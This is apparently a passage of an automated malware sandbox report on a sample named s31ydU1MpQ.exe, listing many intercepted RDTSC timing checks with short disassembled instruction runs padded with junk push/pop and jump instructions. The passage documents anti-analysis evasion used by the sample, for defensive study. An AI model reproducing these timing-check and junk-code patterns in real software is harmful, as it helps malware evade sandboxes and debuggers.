Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 871596 second address: 8715C1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FCBAD522AB4h 0x00000009 jmp 00007FCBAD522AB3h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 879BF7 second address: 879C19 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jmp 00007FCBACB2D128h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push esi 0x0000000e pop esi 0x0000000f rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 879C19 second address: 879C1D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 879C1D second address: 879C3A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edi 0x00000009 push ebx 0x0000000a jmp 00007FCBACB2D11Eh 0x0000000f pushad 0x00000010 pushad 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 877CFF second address: 877D2D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FCBAD522AAFh 0x0000000d jmp 00007FCBAD522AB7h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 877D2D second address: 877D46 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FCBACB2D118h 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b jmp 00007FCBACB2D11Ah 0x00000010 push ebx 0x00000011 pop ebx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 877EBF second address: 877ECF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jne 00007FCBAD522AA6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 877ECF second address: 877ED9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007FCBACB2D116h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 877ED9 second address: 877EDD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 877EDD second address: 877EE3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 877EE3 second address: 877EEC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 8781CE second address: 8781D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 8781D3 second address: 8781DF instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 push edi 0x00000006 pop edi 0x00000007 pop edx 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 8781DF second address: 8781E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 8781E5 second address: 8781E9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 878383 second address: 878397 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBACB2D11Ah 0x00000007 jo 00007FCBACB2D116h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 878397 second address: 87839D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 878C29 second address: 878C34 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 pop eax 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 878C34 second address: 878C3E instructions: 0x00000000 rdtsc 0x00000002 jl 00007FCBAD522AA6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 878C3E second address: 878C55 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBACB2D11Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 878C55 second address: 878C68 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FCBAD522AAFh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 878C68 second address: 878C78 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jng 00007FCBACB2D116h 0x0000000e push eax 0x0000000f pop eax 0x00000010 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 878C78 second address: 878C8E instructions: 0x00000000 rdtsc 0x00000002 jo 00007FCBAD522AA6h 0x00000008 jmp 00007FCBAD522AACh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 8778F1 second address: 8778F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 8778F7 second address: 8778FB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 87C068 second address: 87C070 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 87C070 second address: 87C083 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007FCBAD522AA6h 0x0000000a push edi 0x0000000b pop edi 0x0000000c jbe 00007FCBAD522AA6h 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 87C083 second address: 87C0CE instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jo 00007FCBACB2D116h 0x00000009 pop esi 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d jmp 00007FCBACB2D127h 0x00000012 jmp 00007FCBACB2D129h 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a push eax 0x0000001b push eax 0x0000001c push edx 0x0000001d je 00007FCBACB2D116h 0x00000023 pushad 0x00000024 popad 0x00000025 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 87C0CE second address: 87C0D2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 87BF23 second address: 87BF35 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 jng 00007FCBACB2D116h 0x0000000b jno 00007FCBACB2D116h 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 87BF35 second address: 87BF44 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jg 00007FCBAD522AA6h 0x00000009 pushad 0x0000000a popad 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 8813FB second address: 881430 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edi 0x00000007 jc 00007FCBACB2D12Ch 0x0000000d jmp 00007FCBACB2D124h 0x00000012 pushad 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007FCBACB2D120h 0x0000001b rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 881430 second address: 881434 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 881434 second address: 881443 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 js 00007FCBACB2D116h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 881572 second address: 88159E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ecx 0x00000009 push edx 0x0000000a pop edx 0x0000000b jnc 00007FCBAD522AA6h 0x00000011 pop ecx 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 jmp 00007FCBAD522AB6h 0x0000001b rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 88159E second address: 8815A2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 8816CA second address: 8816CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 8816CE second address: 8816D4 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 882EA6 second address: 882EDD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FCBAD522AB3h 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jl 00007FCBAD522AA6h 0x00000013 jmp 00007FCBAD522AB6h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 882EDD second address: 882EF4 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FCBACB2D116h 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop edx 0x0000000d pop eax 0x0000000e jc 00007FCBACB2D134h 0x00000014 push ebx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 8850DB second address: 8850E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 8850E1 second address: 8850F3 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FCBACB2D118h 0x00000008 push eax 0x00000009 push edx 0x0000000a jnl 00007FCBACB2D116h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 8850F3 second address: 8850F7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 8850F7 second address: 885103 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push edi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 885103 second address: 88513E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push edx 0x00000006 jl 00007FCBAD522AA6h 0x0000000c pop edx 0x0000000d jmp 00007FCBAD522AB7h 0x00000012 pushad 0x00000013 jmp 00007FCBAD522AACh 0x00000018 ja 00007FCBAD522AA6h 0x0000001e pushad 0x0000001f popad 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 88F609 second address: 88F60D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 891AB9 second address: 891ABD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 891ABD second address: 891AC1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 891AC1 second address: 891AC7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 891AC7 second address: 891ACD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 891ACD second address: 891AEA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBAD522AB1h 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a pop eax 0x0000000b jns 00007FCBAD522AA6h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 8917E4 second address: 8917E9 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 89B541 second address: 89B545 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 89FF68 second address: 89FF74 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jc 00007FCBACB2D116h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 89FF74 second address: 89FFB2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBAD522AB9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FCBAD522AAAh 0x00000010 jmp 00007FCBAD522AB5h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 89FFB2 second address: 89FFB8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 89FFB8 second address: 89FFBC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 8A6C0F second address: 8A6C15 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 8A6C15 second address: 8A6C1B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 8A6AAA second address: 8A6AAE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 8A6AAE second address: 8A6AE2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBAD522AB4h 0x00000007 push edi 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007FCBAD522AB6h 0x00000010 push eax 0x00000011 push edx 0x00000012 push edi 0x00000013 pop edi 0x00000014 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 8AC4AC second address: 8AC4C0 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FCBACB2D116h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jnl 00007FCBACB2D116h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 8AC4C0 second address: 8AC4C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 8AC4C4 second address: 8AC4FF instructions: 0x00000000 rdtsc 0x00000002 jl 00007FCBACB2D116h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007FCBACB2D129h 0x0000000f push ebx 0x00000010 push esi 0x00000011 pop esi 0x00000012 pop ebx 0x00000013 popad 0x00000014 pushad 0x00000015 pushad 0x00000016 pushad 0x00000017 popad 0x00000018 jmp 00007FCBACB2D11Dh 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 8AC4FF second address: 8AC50F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jnc 00007FCBAD522AA8h 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 8AC50F second address: 8AC515 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 8AC654 second address: 8AC658 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 8ACA67 second address: 8ACA6D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 8ACA6D second address: 8ACA79 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 8ACF18 second address: 8ACF1D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 8ACF1D second address: 8ACF31 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jno 00007FCBAD522AA6h 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f pushad 0x00000010 push ecx 0x00000011 pop ecx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 8BE64E second address: 8BE674 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007FCBACB2D11Fh 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FCBACB2D11Ch 0x00000012 push ebx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 8BE674 second address: 8BE679 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 8BE679 second address: 8BE682 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pushad 0x00000004 popad 0x00000005 pop eax 0x00000006 push ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 8C1BD6 second address: 8C1BDE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 8C1BDE second address: 8C1BE2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 8C1BE2 second address: 8C1BE6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 8BBF3A second address: 8BBF58 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FCBACB2D11Ah 0x00000008 push edx 0x00000009 pop edx 0x0000000a push edx 0x0000000b pop edx 0x0000000c pop edx 0x0000000d pop eax 0x0000000e js 00007FCBACB2D151h 0x00000014 push eax 0x00000015 push edx 0x00000016 je 00007FCBACB2D116h 0x0000001c push edi 0x0000001d pop edi 0x0000001e rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 8E4AC4 second address: 8E4AD7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 push edi 0x00000007 pop edi 0x00000008 popad 0x00000009 jo 00007FCBAD522AAEh 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 8E4AD7 second address: 8E4ADB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 8E4ADB second address: 8E4AF5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBAD522AAEh 0x00000007 push eax 0x00000008 push edx 0x00000009 jns 00007FCBAD522AA6h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 8E4AF5 second address: 8E4AF9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 8E4AF9 second address: 8E4B16 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBAD522AB9h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 8E39A3 second address: 8E39A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 8E39A7 second address: 8E39AD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 8E39AD second address: 8E39C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 ja 00007FCBACB2D122h 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 8E39C9 second address: 8E39CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 8E39CD second address: 8E39DD instructions: 0x00000000 rdtsc 0x00000002 je 00007FCBACB2D116h 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 8E39DD second address: 8E39F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FCBAD522AB7h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 8E3CA8 second address: 8E3CB4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 8E3CB4 second address: 8E3CB8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 8E3E1F second address: 8E3E23 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 8E4392 second address: 8E4396 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 8E4660 second address: 8E467F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FCBACB2D128h 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
